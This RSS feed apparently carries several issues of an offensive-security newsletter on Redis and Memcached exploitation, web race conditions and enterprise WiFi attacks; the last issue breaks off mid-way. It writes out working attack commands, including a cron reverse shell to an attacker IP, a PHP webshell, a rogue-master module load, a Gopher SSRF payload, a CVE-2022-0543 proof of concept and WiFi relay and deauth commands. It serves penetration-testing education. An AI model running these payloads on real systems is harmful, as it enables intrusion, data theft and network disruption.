<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Kayssel - Offensive Security Blog</title><description>Offensive Security Documentation by Ruben Santos Garcia</description><link>https://www.kayssel.com/</link><language>en-us</language><item><title>Redis and Memcached: When Cache Becomes a Foothold</title><link>https://www.kayssel.com/newsletter/issue-41</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-41</guid><description>Unauthenticated access, file-write RCE, module loading, SSRF via Gopher, CVE-2022-0543 Lua sandbox escape, and Memcached data extraction</description><pubDate>Sun, 15 Mar 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Last week we covered race conditions and the single-packet attack. This week we go back to infrastructure.

Redis and Memcached are the default caching layer in most modern web stacks. Both run without authentication by default, exposed to the internal network under the assumption that the perimeter provides protection. That assumption fails constantly: misconfigured Docker containers, cloud security groups with overly permissive rules, and SSRF vulnerabilities that reach internal services. When you land inside a network or find an SSRF pointing inward, these services escalate from cache to shell in minutes.

This week: unauthenticated access, file-write RCE, module loading, SSRF via Gopher, Lua sandbox escape, and Memcached data extraction.

Let&apos;s get into it 👇

## 🔍 Recon: Finding the Attack Surface

Default Redis port: **6379/TCP**. Default Memcached port: **11211/TCP and UDP**.

```bash
# Nmap service detection
nmap -sV -p 6379,11211 -T4 &lt;target&gt;

# Quick Redis auth check
redis-cli -h &lt;target&gt; -p 6379 ping

# Memcached version and stats
echo &quot;version&quot; | nc -q1 &lt;target&gt; 11211
echo &quot;stats&quot; | nc -q1 &lt;target&gt; 11211
```

A `PONG` from Redis with no `AUTH` challenge means unauthenticated access. From there you&apos;ve got full read/write on the database and access to the `CONFIG` command. That combination is all you need.

[Redis Protected Mode](https://redis.io/docs/latest/operate/oss_and_stack/management/security/) was introduced in Redis 3.2.0 and, when enabled, only accepts local connections if no password is set. The problem is that it gets bypassed the moment someone adds `bind 0.0.0.0` to the config, which is standard practice in containerized and cloud deployments where services need to talk across subnets.

## 💀 Unauthenticated Access: What You Can Do

Once you&apos;ve confirmed unauthenticated access, start with recon.

```bash
# Check Redis version and configuration
redis-cli -h &lt;target&gt; INFO server | grep redis_version
redis-cli -h &lt;target&gt; CONFIG GET dir
redis-cli -h &lt;target&gt; CONFIG GET dbfilename

# Dump all keys
redis-cli -h &lt;target&gt; KEYS &quot;*&quot;

# Read values (replace &quot;session:user123&quot; with real key)
redis-cli -h &lt;target&gt; GET &quot;session:user123&quot;

# Check all databases
redis-cli -h &lt;target&gt; INFO keyspace
```

Session tokens, API keys, OAuth tokens, internal application state. Cached data is rarely encrypted. If the application stores sessions in Redis, you can pull active session tokens and authenticate as any user without a password.

The `CONFIG` command is where things escalate. It lets you change Redis&apos;s working directory and dump file name at runtime. The database then gets written to that location on disk on the next `SAVE`.

## 🔑 RCE via File Write

This is the classic Redis RCE technique. You repoint Redis&apos;s dump file at a location you control, write a malicious payload into a key, and force a save. Redis writes the entire database to disk, embedding your payload in the dump file.

**Technique 1: SSH authorized_keys**

Requires Redis running as a user with a home directory and SSH enabled.

```bash
redis-cli -h &lt;target&gt; CONFIG SET dir /root/.ssh
redis-cli -h &lt;target&gt; CONFIG SET dbfilename authorized_keys
redis-cli -h &lt;target&gt; SET pwned &quot;\n\nssh-rsa AAAA...your-public-key...\n\n&quot;
redis-cli -h &lt;target&gt; SAVE
```

The dump file contains binary Redis headers around your key. SSH ignores malformed lines and will find and accept the valid public key entry. Then:

```bash
ssh -i ~/.ssh/id_rsa root@&lt;target&gt;
```

**Technique 2: Cron job**

Requires Redis running as root, or knowledge of the cron directory path.

```bash
redis-cli -h &lt;target&gt; CONFIG SET dir /etc/cron.d
redis-cli -h &lt;target&gt; CONFIG SET dbfilename redis-shell
redis-cli -h &lt;target&gt; SET payload &quot;\n\n* * * * * root bash -i &gt;&amp; /dev/tcp/&lt;attacker-ip&gt;/4444 0&gt;&amp;1\n\n&quot;
redis-cli -h &lt;target&gt; SAVE
```

Start a listener and wait for the cron job to fire. It runs as root if Redis runs as root, which is common in poorly configured deployments.

**Technique 3: Webshell**

If you know the web root path, write a webshell directly.

```bash
redis-cli -h &lt;target&gt; CONFIG SET dir /var/www/html
redis-cli -h &lt;target&gt; CONFIG SET dbfilename shell.php
redis-cli -h &lt;target&gt; SET shell &quot;&lt;?php system(\$_GET[&apos;cmd&apos;]); ?&gt;&quot;
redis-cli -h &lt;target&gt; SAVE
```

The Redis binary dump format wraps your payload in headers, but PHP will skip to the first valid `&lt;?php` tag and execute from there.

## ⚙️ Module Loading RCE (Redis 4.x and 5.x)

Redis 4.x introduced the [`MODULE LOAD`](https://redis.io/docs/latest/commands/module-loadex/) command. It loads a shared object (`.so` file) as a Redis module, extending the server with new commands. Attackers abused master-slave replication to push a malicious module to the target.

[redis-rogue-server](https://github.com/n0b0dyCN/redis-rogue-server) automates the full chain.

**The attack works in three steps:**

1. Your machine acts as a rogue Redis master.
2. You tell the target Redis to `SLAVEOF` your machine.
3. The target connects for replication. You respond with `FULLRESYNC` and transfer a malicious `.so` file.
4. You issue `MODULE LOAD /path/to/exp.so` on the target. It executes with Redis process privileges.

```bash
# Attacker machine
python redis-rogue-server.py \
  --rhost &lt;target-ip&gt; \
  --rport 6379 \
  --lhost &lt;attacker-ip&gt; \
  --lport 21000 \
  --exp exp.so
```

The implicit trust in the master-slave replication protocol is the root cause. A slave accepts file synchronization and commands from whatever it&apos;s told is its master. There&apos;s no certificate verification or challenge-response.

**Affected versions:** Redis 4.x and 5.x. Redis 6.0+ introduced ACLs that restrict `MODULE LOAD` to explicit `@admin` users, and Redis 7.0 disabled module loading by default. If you&apos;re testing a containerized environment running Redis 4 or 5 because &quot;it works and we haven&apos;t updated it,&quot; this technique applies.

## 🌐 SSRF to Redis: Gopher Protocol

SSRF vulnerabilities that can reach internal Redis instances are a critical finding. If you covered [Issue 4 on SSRF](https://www.kayssel.com/newsletter/issue-4/), this is where it gets interesting: `gopher://` protocol support lets you send raw TCP data to any reachable host and port. Redis speaks a plaintext protocol called RESP. You can send arbitrary RESP commands through a Gopher URL.

[Gopherus](https://github.com/tarunkant/Gopherus) generates the payloads automatically.

```bash
# Install and run
git clone https://github.com/tarunkant/Gopherus
python gopherus.py --exploit redis
```

Gopherus asks what you want to do (write SSH key, write webshell, etc.) and outputs a `gopher://` URL. You inject that URL into the SSRF parameter.

```
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0AFLUSHALL%0D%0A...
```

The URL-encoded string is a sequence of RESP commands. The target application fetches it, the HTTP library speaks Gopher, and Redis processes the commands as if they came from a legitimate client.

**When you&apos;ll see this:** PHP applications with `file_get_contents()` and user-controlled URLs. Java applications using `java.net.URL`. Any SSRF that doesn&apos;t explicitly block `gopher://` in its scheme whitelist. Cloud metadata SSRF endpoints that have lateral reach to internal services.

Check the SSRF vulnerability for `gopher://` support by testing `gopher://127.0.0.1:6379/_PING%0D%0A` and looking for a `+PONG` in the response body or a difference in response behavior.

## 🐛 CVE-2022-0543: Lua Sandbox Escape

[CVE-2022-0543](https://nvd.nist.gov/vuln/detail/CVE-2022-0543) is CVSS 10.0. It&apos;s a Lua sandbox escape that allows arbitrary code execution with Redis process privileges. CISA added it to the Known Exploited Vulnerabilities catalog.

Here&apos;s the catch: this isn&apos;t an upstream Redis vulnerability. It&apos;s a **Debian and Ubuntu packaging issue**. The Debian maintainers packaged the Lua interpreter in a way that exposed the `package` global variable inside the Redis Lua sandbox, which should have been stripped out. Through `package.loadlib()`, you can load arbitrary shared libraries.

**Affected distributions:**
- Debian 9, 10, 11
- Ubuntu 20.04, 21.10

**Affected Redis package versions:**
- `redis ≤ 5.0.14-1+deb10u1` (Debian 10)
- `redis ≤ 6.0.15-1` (various)

**Exploitation:** Requires `EVAL` command access. On an unauthenticated Redis instance this is trivially available.

```bash
# Test if vulnerable (attempt to load libc)
redis-cli -h &lt;target&gt; EVAL &quot;local io_l = package.loadlib(&apos;/usr/lib/x86_64-linux-gnu/libc.so.6&apos;, &apos;luaopen_io&apos;); local io = io_l(); local f = io.popen(&apos;id&apos;, &apos;r&apos;); local res = f:read(&apos;*a&apos;); f:close(); return res&quot; 0
```

If the instance is vulnerable, you&apos;ll get the output of `id` back. That&apos;s unauthenticated RCE with no `CONFIG` access needed, no write permissions, none of the file-write setup. Just `EVAL` and you&apos;re in.

**Fixed in:** Redis 6.0.16-1+deb11u2, 5.0.14-1+deb10u2. If the target is Debian/Ubuntu and running an older Redis package version, check this first.

## 🗄 Memcached: Data Extraction and UDP Amplification

Memcached has no authentication by default. SASL auth exists but requires explicit compilation support and is rarely enabled. If you can reach port 11211, you can read everything in cache.

**Enumeration and extraction:**

```bash
# Get server stats
echo &quot;stats&quot; | nc -q1 &lt;target&gt; 11211

# List all slab IDs
echo &quot;stats items&quot; | nc -q1 &lt;target&gt; 11211

# Dump keys from a slab (replace 1 with actual slab ID, 0 = unlimited)
echo &quot;stats cachedump 1 0&quot; | nc -q1 &lt;target&gt; 11211

# Retrieve a cached item
echo &quot;get &lt;key&gt;&quot; | nc -q1 &lt;target&gt; 11211
```

`stats items` returns the slab IDs and item counts. `stats cachedump &lt;slab&gt; &lt;count&gt;` returns the actual key names. `get &lt;key&gt;` retrieves the value. On most applications this means session tokens, user objects, API responses with PII, and internal application data.

**CVE-2018-1000115: UDP Amplification**

[CVE-2018-1000115](https://nvd.nist.gov/vuln/detail/cve-2018-1000115) affects Memcached 1.5.5. A single small UDP request with a spoofed source IP triggers a response up to 50,000 times larger. Attackers used this in the February 2018 GitHub DDoS attack (1.3 Tbps peak), which was the largest DDoS attack recorded at the time.

**Check if UDP is open:**

```bash
nmap -sU -p 11211 &lt;target&gt;
echo &quot;version&quot; | nc -u -q1 &lt;target&gt; 11211
```

This is a finding worth noting even if direct exploitation isn&apos;t in scope. The fix is upgrading to Memcached 1.5.6+ where UDP is disabled by default, or explicitly disabling it with the `-U 0` flag.

## 🎯 Key Takeaways

Redis with no authentication and `CONFIG` access is a direct path to RCE. File write to SSH keys or cron is reliable when Redis runs as root or a privileged user. Module loading via redis-rogue-server works against Redis 4.x and 5.x where ACLs aren&apos;t enforced. Neither technique requires a CVE.

CVE-2022-0543 changes the calculation for Debian and Ubuntu targets. CVSS 10.0. No `CONFIG` access needed. If the target is running a vulnerable Debian or Ubuntu Redis package, `EVAL` alone gives you code execution.

SSRF vulnerabilities that support `gopher://` and can reach internal Redis or Memcached instances should be rated critical. Gopherus generates ready-to-use payloads. The internal cache network is never hardened against this because the assumption is the external SSRF won&apos;t exist.

Memcached is typically overlooked. No authentication, full key enumeration, and cached session tokens are a consistent finding in any environment where Memcached is exposed on the internal network.

---

**Practice:**

- [HackTricks: Redis RCE](https://hacktricks.wiki/en/network-services-pentesting/6379-pentesting-redis.html) - comprehensive Redis pentesting reference
- [HackTricks: Memcached](https://hacktricks.wiki/en/network-services-pentesting/11211-memcache/index.html) - Memcached enumeration and exploitation
- [Gopherus GitHub](https://github.com/tarunkant/Gopherus) - SSRF payload generator for Redis, Memcached, FastCGI, MySQL, and more
- [redis-rogue-server GitHub](https://github.com/n0b0dyCN/redis-rogue-server) - module loading RCE for Redis 4.x/5.x
- [Redis Security Documentation](https://redis.io/docs/latest/operate/oss_and_stack/management/security/) - official hardening reference
- [CVE-2022-0543 NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2022-0543) - Lua sandbox escape (CVSS 10.0, Debian/Ubuntu)
- [TryHackMe: Redis (Jack)](https://tryhackme.com/room/jackofalltradesjr) - practice Redis exploitation in a lab environment

---

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>infrastructure-security</category><author>Ruben Santos</author></item><item><title>Race Conditions: When Timing Is Everything</title><link>https://www.kayssel.com/newsletter/issue-40</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-40</guid><description>TOCTOU mechanics, limit overrun attacks, multi-endpoint races, and the single-packet technique that makes all of this consistently exploitable</description><pubDate>Sun, 08 Mar 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

After four weeks on WiFi, we&apos;re back to web security.

Race conditions show up constantly in bug bounty programs. The problem has always been reliable exploitation: send two requests 50ms apart and the server processes them sequentially. No race. James Kettle&apos;s 2023 research at PortSwigger changed that by showing how HTTP/2 eliminates network jitter entirely.

If you caught [Issue 11](https://www.kayssel.com/newsletter/issue-11/) on Web3 withdrawals, you saw race conditions mentioned in the context of double-spending. That was the surface. This week we go deep: TOCTOU mechanics, the single-packet attack, limit overrun, and multi-endpoint races.

Let&apos;s break some state machines 👇

## ⏱ The Core Problem: TOCTOU

**Time-Of-Check to Time-Of-Use (TOCTOU)** is the root cause of most web race conditions.

The application checks a condition at one point in time. Then it acts on the result at a later point. Between check and action, the state can change. An attacker who lands requests inside that window can make the application act on a condition that is no longer true.

Classic example: gift card redemption.

```
1. App checks if gift card has been used → status: unused
2. [race window opens]
3. App marks gift card as used
4. App credits balance
```

Send 20 requests simultaneously. All 20 arrive at step 1. All 20 see status: unused. All 20 proceed to step 4. One gift card becomes 20 credits.

The race window is the gap between check and action. Narrow windows (microseconds, single database transaction split into two queries) are harder to hit but still exploitable with the right tooling. Your job is to identify the window and fill it.

## 🔍 Finding the Race Window

Three signals point to exploitable race conditions.

**Limit enforcement on countable actions.** Gift cards, discount codes, referral bonuses, free trial activations, vote counts. Any operation the application limits per user or per resource. If the limit is checked before the action is recorded, it&apos;s potentially raceable.

**Suspicious error timing.** Errors like &quot;insufficient funds&quot; appearing after a transaction completes suggest the balance check and the deduction are separate operations. That gap is your window.

**State transitions on single-use resources.** Password reset tokens, email verification codes, one-time links. Any resource that transitions from valid to used in two separate steps is a candidate.

**How to test:** Send the same state-changing request twice simultaneously. Different response codes or bodies between two identical requests indicate state-dependent behavior worth investigating.

## ⚡ The Single-Packet Attack

The problem with race conditions has always been network jitter. Requests sent milliseconds apart arrive milliseconds apart. The server processes them sequentially. No race.

James Kettle&apos;s 2023 paper [&quot;Smashing the state machine&quot;](https://portswigger.net/research/smashing-the-state-machine) introduced the single-packet attack. [HTTP/2 (RFC 9113)](https://datatracker.ietf.org/doc/html/rfc9113) multiplexes multiple requests over a single TCP connection. A client can send multiple complete HTTP/2 requests in one TCP packet. The server receives all of them before processing any.

**Network jitter eliminated. Completely.**

For HTTP/1.1 targets, the technique is **last-byte synchronization**. Send all requests with everything except the final byte. Hold the last bytes. Flush them all simultaneously. Requests complete at near-identical times without HTTP/2 support.

Burp Suite&apos;s Turbo Intruder handles both automatically.

## 💀 Attack 1: Limit Overrun

Limit overrun is the most common race condition in bug bounty. You exceed a per-user limit by sending requests faster than the application can enforce it.

**Scenario:** A platform allows one redemption per promo code. Endpoint: `POST /api/promo/redeem`.

**Step 1:** Confirm the endpoint works. Redeem once manually, verify the discount applies.

**Step 2:** Reset state (fresh account or fresh code) and launch the race.

**Turbo Intruder script for single-packet attack (HTTP/2 targets):**

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2)

    for i in range(20):
        engine.queue(target.req, gate=&apos;race1&apos;)

    engine.openGate(&apos;race1&apos;)

def handleResponse(req, interesting):
    table.add(req)
```

The `gate` parameter holds all 20 requests until `openGate` fires. All 20 release in a single HTTP/2 packet. The server receives them simultaneously before processing any of them.

**What success looks like:**
- Multiple `200 OK` responses where you expected only one
- Different response bodies across simultaneous requests (state inconsistency)
- One success followed by &quot;already redeemed&quot; errors, but the credit appears multiple times

## 🔀 Attack 2: Multi-Endpoint Race

Harder to find, higher impact. Two different endpoints share state. The check happens on one. The action happens on another.

**Scenario:** An e-commerce checkout flow.

```
POST /api/cart/checkout   → validates cart, processes payment
POST /api/cart/add-item   → adds an item to the cart
```

After initiating checkout (state: under review), add an item to the cart before the checkout finalizes. If the checkout reads cart contents once and the add-item endpoint doesn&apos;t validate checkout state, you get an item added post-validation.

```
T=0ms   POST /api/cart/checkout   (payment submitted, state: processing)
T=0ms   POST /api/cart/add-item   (item added simultaneously)
```

Some applications finalize the order and update the cart in separate database transactions. Land your request in that gap and the item ships without payment.

**How to map this:** Look for shared identifiers across endpoints (cart ID, session, order ID). Any endpoint that reads a shared resource without locking it is a candidate for this attack. Checkout flows, balance transfers, inventory reservations, and multi-step form submissions are all worth testing.

## 🛠 Turbo Intruder

[Turbo Intruder](https://github.com/PortSwigger/turbo-intruder) is the standard tool for web race conditions. Install it from the [BApp Store](https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988).

**For HTTP/1.1 targets (last-byte sync):**

```python
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=20,
                           engine=Engine.THREADED,
                           lastByte=True)

    for i in range(20):
        engine.queue(target.req, gate=&apos;race1&apos;)

    engine.openGate(&apos;race1&apos;)

def handleResponse(req, interesting):
    table.add(req)
```

`lastByte=True` holds the final byte of each request in the send buffer. `openGate` flushes them simultaneously. Less precise than the HTTP/2 single-packet approach, but effective when the server doesn&apos;t support HTTP/2.

**Choosing the right engine:**
- HTTP/2 target: `Engine.BURP2` with `concurrentConnections=1` and gate
- HTTP/1.1 target: `Engine.THREADED` with `lastByte=True` and gate
- When unsure: try BURP2 first, fall back to THREADED

## 🎯 Key Takeaways

Race conditions are consistently underreported because reliable exploitation used to require perfect network conditions. The single-packet attack removes that constraint. If the target speaks HTTP/2, you can send 20 simultaneous requests in one TCP packet and the network is no longer a factor.

Limit overrun is where you start on any new target. Any endpoint that enforces a per-user limit by checking a database field before writing the result is worth testing. Gift cards, promo codes, referral bonuses, vote buttons, free trial activations.

Multi-endpoint races require mapping the application&apos;s state machine. Find endpoints that share state without locking. The check happens on one endpoint. The action happens on another. Checkout flows and balance transfers are the highest-value targets.

Turbo Intruder handles both attack patterns. Gate mechanism for simultaneous release. `Engine.BURP2` for HTTP/2. `Engine.THREADED` with `lastByte=True` for HTTP/1.1.

---

**Practice:**

- [PortSwigger Academy: Race Conditions](https://portswigger.net/web-security/race-conditions) - four labs covering limit overrun, multi-endpoint, single-endpoint partial construction, and connection warming
- James Kettle&apos;s full paper: [&quot;Smashing the state machine&quot;](https://portswigger.net/research/smashing-the-state-machine) - required reading before your next engagement

---

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>WiFi Hacking 101: Wrapping Up the Series (Part 4)</title><link>https://www.kayssel.com/newsletter/issue-39</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-39</guid><description>PEAP relay attacks, ESSID stripping for WIDS bypass, and a complete wireless assessment checklist for enterprise engagements</description><pubDate>Sun, 01 Mar 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Last week we covered enterprise WiFi exploitation. The 802.1X architecture. EAP methods and their weaknesses. Credential capture with Evil Twin. Legacy method exploitation (PAP, EAP-MD5). Pass-the-Hash using captured NT hashes directly in wpa_supplicant.

This week we close the series with the two techniques that sit at the top of the enterprise WiFi attack chain: PEAP relay and ESSID stripping. Then a wireless assessment checklist you can use on your next engagement.

Let&apos;s finish strong 👇

## ⚡ PEAP Relay Attack

PEAP relay was introduced in 2018 by Michael Kruger and Dominic White in their paper &quot;Practical attacks against WPA-EAP-PEAP.&quot; It&apos;s categorically different from what we covered last week.

Credential capture attacks (eaphammer, hostapd-wpe) require the victim to connect to your rogue AP and then you crack the NetNTLMv1 hash offline. PEAP relay skips cracking entirely. You forward the victim&apos;s live authentication exchange to the real network. The RADIUS server authenticates it. You get network access.

No hash. No cracking. No password.

**Key constraints:**

- Works with PEAP+MSCHAPv2 only. Not TTLS+MSCHAPv2.
- Requires at least 3 wireless adapters.
- Timing matters. Complex setup.

### Why This Works

The [IEEE 802.1X standard](https://standards.ieee.org/ieee/802.1X/7345/) trusts that EAP frames come from legitimate sources. Without cryptographic binding, there&apos;s nothing tying the authentication session to the physical client that started it. You&apos;re just a frame forwarder. The RADIUS server can&apos;t tell.

The relay depends on `crypto_binding=0` in the PEAP exchange. Crypto binding (documented in [RFC 5281](https://datatracker.ietf.org/doc/html/rfc5281)) links the outer TLS tunnel to the inner MSCHAPv2 session. When disabled, you can relay one without the other. Many enterprise networks still accept `crypto_binding=0` for backwards compatibility with legacy clients.

### Attack Architecture

```
[Victim] ---&gt; [Rogue AP (berate-ap)] ---&gt; [wpa_sycophant] ---&gt; [Legit AP] ---&gt; [RADIUS]
```

Three components, three adapters running simultaneously.

**[berate_ap](https://github.com/sensepost/berate_ap)** (SensePost/Orange Cyberdefense) acts as the rogue AP. It intercepts the victim&apos;s EAP frames and passes them to wpa_sycophant.

**[wpa_sycophant](https://github.com/sensepost/wpa_sycophant)** (SensePost) is a patched wpa_supplicant that relays those frames to the legitimate AP. It connects to the real network on behalf of the victim.

**DoS adapter** forces the victim off the real AP so they reconnect to yours.

### wpa_sycophant Configuration

```
network={
    ssid=&quot;CorporateWiFi&quot;
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity=&quot;&quot;              # Leave blank
    anonymous_identity=&quot;&quot;    # Leave blank
    password=&quot;&quot;              # Leave blank
    eap=PEAP
    phase1=&quot;crypto_binding=0 peapver=0&quot;
    phase2=&quot;auth=MSCHAPV2&quot;
    bssid_blacklist=AA:BB:CC:DD:EE:FF  # MAC of your berate-ap interface
}
```

`bssid_blacklist` is critical. It prevents wpa_sycophant from connecting to your own rogue AP and creating an infinite loop. Set it to the berate-ap MAC.

If `peapver=0` doesn&apos;t work, try `peapver=1`.

### Execution

**Interface 1 (managed mode)** - Rogue AP:

```bash
berate_ap --eap --mana-wpe --wpa-sycophant --no-virt --mana-credout lo wlan0 &apos;CorporateWiFi&apos;
```

**Interface 2 (managed mode)** - Relay:

```bash
wpa_sycophant -c sycophant.conf -i wlan1
```

**Interface 3 (monitor mode)** - Temporary DoS:

```bash
iw dev wlan2 set channel 6
timeout 5 aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF --ignore-negative-one wlan2mon
```

The deauth burst is temporary by design. You only need the victim to look for an AP once. Keep wlan2 available; you may need to repeat the DoS if the victim reconnects to the real AP before wpa_sycophant establishes the relay.

Once wpa_sycophant connects to the real network it should obtain an IP automatically. If not, run `dhclient wlan1` manually.

### What Stops This

**Enforced crypto binding:** If the RADIUS server requires `crypto_binding=1`, the relay fails. The cryptographic binding links the outer TLS tunnel to the inner MSCHAPv2 session. You can&apos;t split them. FreeRADIUS supports this via `crypto_binding = require` in the PEAP module config, but it&apos;s rarely deployed.

**EAP-TLS:** Immune entirely. No passwords are transmitted. Mutual certificate-based auth means you&apos;d need the client&apos;s private key to impersonate it.

## 🎭 ESSID Stripping

Wireless Intrusion Detection Systems (WIDS) flag rogue APs by matching their SSID against a whitelist of known corporate networks. ESSID stripping defeats this by appending a visually invisible character to the SSID, making it a different string while appearing identical to users.

`CorporateWiFi` and `CorporateWiFi ` (trailing space) are different strings. The WIDS sees no match. No alert fires.

**Invisible characters:**

- Space: `\x20`
- Tab: `\x09`
- Zero-width space: `\xE2\x80\x8B` (Unicode U+200B)

A side effect: Apple devices normally group APs with the same SSID under a single network entry, which would reveal your Evil Twin as a suspicious duplicate. ESSID stripping makes the stripped SSID appear as a separate network to Apple clients, eliminating that visual tell.

### Using eaphammer

[eaphammer&apos;s](https://github.com/s0lst1c3/eaphammer) `--essid-stripping` flag handles this directly:

```bash
python3 ./eaphammer -i wlan0 \
  --auth wpa-eap \
  --essid &apos;CorporateWiFi&apos; \
  --creds \
  --negotiate balanced \
  --essid-stripping &apos;\x20&apos;
```

[airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) applies ESSID stripping automatically during Evil Twin attacks by default, without needing a separate flag.

### What It Doesn&apos;t Bypass

Signature-based WIDS: defeated. Behavior-based systems: not affected.

Behavior-based detection monitors for patterns you can&apos;t hide:

- Deauthentication spikes (volume of deauth frames per client or timeframe)
- Certificate anomalies (your cert doesn&apos;t chain to the corporate CA)
- A known BSSID disappearing while a new one appears on the same channel with a nearly identical SSID
- Unusual EAP negotiation patterns

Modern enterprise WIPS platforms combine both detection methods. ESSID stripping buys you cover against the simpler systems. Don&apos;t treat it as a guarantee.

## 📋 Wireless Assessment Checklist

This is what a complete wireless engagement should cover. Use it as your field guide.

&gt; Always confirm scope before starting. Some tests (DoS, network disruption, segmentation, captive portal bypass) require explicit authorization and agreed time windows. Notify stakeholders before running disruptive tests.

### Reconnaissance

- Confirm agreed SSIDs in scope
- Identify AP models, firmware versions, and known CVEs
- Check physical access to APs
- Scan all bands: 2.4GHz, 5GHz, and 6GHz
- Identify all SSIDs in scope, including hidden networks
- Detect DFS channel usage
- Check for existing rogue APs in the RF environment
- Check wireless client isolation settings
- Check if passwords are visible in common areas

### Open and Personal Networks

- Attempt WEP cracking on any WEP networks found
- Capture WPA/WPA2 4-way handshakes and assess passphrase strength
- Capture PMKIDs (clientless) and assess passphrase strength
- Try Evil Twin + captive portal against WPA/WPA2 PSK networks
- Test WPS Pixie Dust, Null PIN, and brute-force
- Check if WPS PBC is enabled

### WPA3 and Transitional Networks

- Identify WPA2/3 mixed-mode (transitional) networks
- Test downgrade attack against transitional networks
- Test Dragon Drain DoS against WPA3 APs
- Perform online dictionary attack against WPA3-SAE
- Verify MFP/PMF enforcement status
- Test DoS resilience on non-MFP networks

### Enterprise Networks (MGT / 802.1X)

- Gather EAP identities and extract username formats
- Extract AP certificate details: CN, issuer, SANs, expiration, algorithm
- Enumerate accepted EAP methods (EAP_buster)
- Check if legacy/weak methods are accepted: PAP, CHAP, EAP-MD5
- Try Evil Twin credential capture (eaphammer, hostapd-wpe)
- Capture and crack NetNTLMv1 hashes
- Capture plaintext credentials if TTLS+PAP is accepted
- Attempt PEAP relay (wpa_sycophant + berate_ap, 3 adapters)
- Test Pass-the-Hash authentication with captured NT hashes
- Verify whether clients enforce CA validation against a known CA
- Verify certificate robustness: algorithm strength, key length, chain integrity, expiration

### WIDS/WIPS Evaluation

- Identify presence of WIDS/WIPS in the environment
- Test ESSID stripping to evaluate signature-based detection
- Check whether deauth attacks trigger alerts
- Test network segmentation from the wireless segment

## 🎯 Key Takeaways

PEAP relay changes the calculus on enterprise WiFi. You&apos;re not hoping the password is in your wordlist. You forward the authentication live and walk onto the network. Three adapters, one config file, and a target that accepts `crypto_binding=0`. The only reliable defenses are enforced crypto binding and EAP-TLS.

ESSID stripping defeats the most common WIDS detection method. One invisible character. That&apos;s the difference between triggering an alert and not. It doesn&apos;t beat behavior-based detection, but it removes the easiest catch.

The checklist is your pre-flight. Each item represents a finding category. Work through it on every engagement. The most consistent enterprise WiFi findings are PEAP without CA validation, legacy EAP methods left enabled, and WPS still active on APs that should have had it disabled years ago.

---

That wraps up the WiFi series.

Four issues. Hardware and fundamentals. WPA/WPA2 cracking, PMKID, WPS, and WPA3. Enterprise credential capture, Pass-the-Hash, and EAP method exploitation. PEAP relay and ESSID stripping.

Build a lab. FreeRADIUS on a Raspberry Pi. Practice until the 802.1X flow makes sense at the frame level. These attacks work because organizations optimize for compatibility. Your job is to find where they made that trade-off.

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>wireless-security</category><author>Ruben Santos</author></item><item><title>WiFi Hacking 101: Exploiting Enterprise Networks (Part 3)</title><link>https://www.kayssel.com/newsletter/issue-38</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-38</guid><description>Breaking into 802.1X enterprise WiFi through credential capture, legacy method exploitation, and Pass-the-Hash attacks</description><pubDate>Sun, 22 Feb 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

We&apos;re continuing the WiFi series this week, moving into enterprise network exploitation. This is Part 3, based on the WiFi security course I took last month with [@OscarAkaElvis](https://twitter.com/OscarAkaElvis) (creator of [airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon)).

Parts 1 and 2 covered the fundamentals: hardware setup, monitor mode, WPA/WPA2 cracking, PMKID attacks, WPS exploitation, and WPA3 vulnerabilities. That&apos;s the home network and small business landscape.

Enterprise WiFi is different. 802.1X authentication with RADIUS servers. Individual user credentials instead of shared passwords. EAP methods like PEAP, TTLS, and TLS. Certificate-based mutual authentication.

On paper, it&apos;s significantly more secure than WPA2-PSK. In practice, it&apos;s consistently misconfigured.

The problem is compatibility. Organizations deploy PEAP+MSCHAPv2 (which leaks NetNTLMv1 hashes ready for offline cracking) because it works with Windows without additional configuration. They enable legacy authentication methods like PAP and EAP-MD5 for backwards compatibility with ancient devices. They skip certificate validation on client devices to avoid support tickets.

Every one of these decisions creates an attack vector.

This week we&apos;re covering the fundamentals of enterprise WiFi exploitation: 802.1X architecture, EAP authentication methods, reconnaissance techniques, credential capture attacks with Evil Twin, legacy method exploitation, and Pass-the-Hash.

Part 4 (next week) will cover the advanced techniques: PEAP relay attacks, ESSID stripping for WIDS bypass, and comprehensive defensive mitigations.

Let&apos;s exploit some enterprise WiFi 👇

## 🏢 Enterprise WiFi Architecture

Enterprise WiFi uses **802.1X** (IEEE standard from 2001) for network access control. Instead of a shared password like WPA2-PSK, each user authenticates with individual credentials verified against a backend RADIUS server.

**Key components:**

**Supplicant** - The client device (laptop, phone) trying to connect. Runs wpa_supplicant or Windows supplicant.

**Authenticator** - The access point. Doesn&apos;t make auth decisions, just forwards EAP frames between supplicant and RADIUS server.

**Authentication Server** - RADIUS server integrated with Active Directory or LDAP. Makes the accept/reject decision.

**Authentication flow:**

```
1. Client sends EAPOL-Start to AP
2. AP forwards EAP-Identity-Request to client
3. Client responds with identity (username@domain.com)
4. AP forwards to RADIUS server
5. RADIUS server initiates EAP method (PEAP, TTLS, TLS)
6. Client and RADIUS establish TLS tunnel
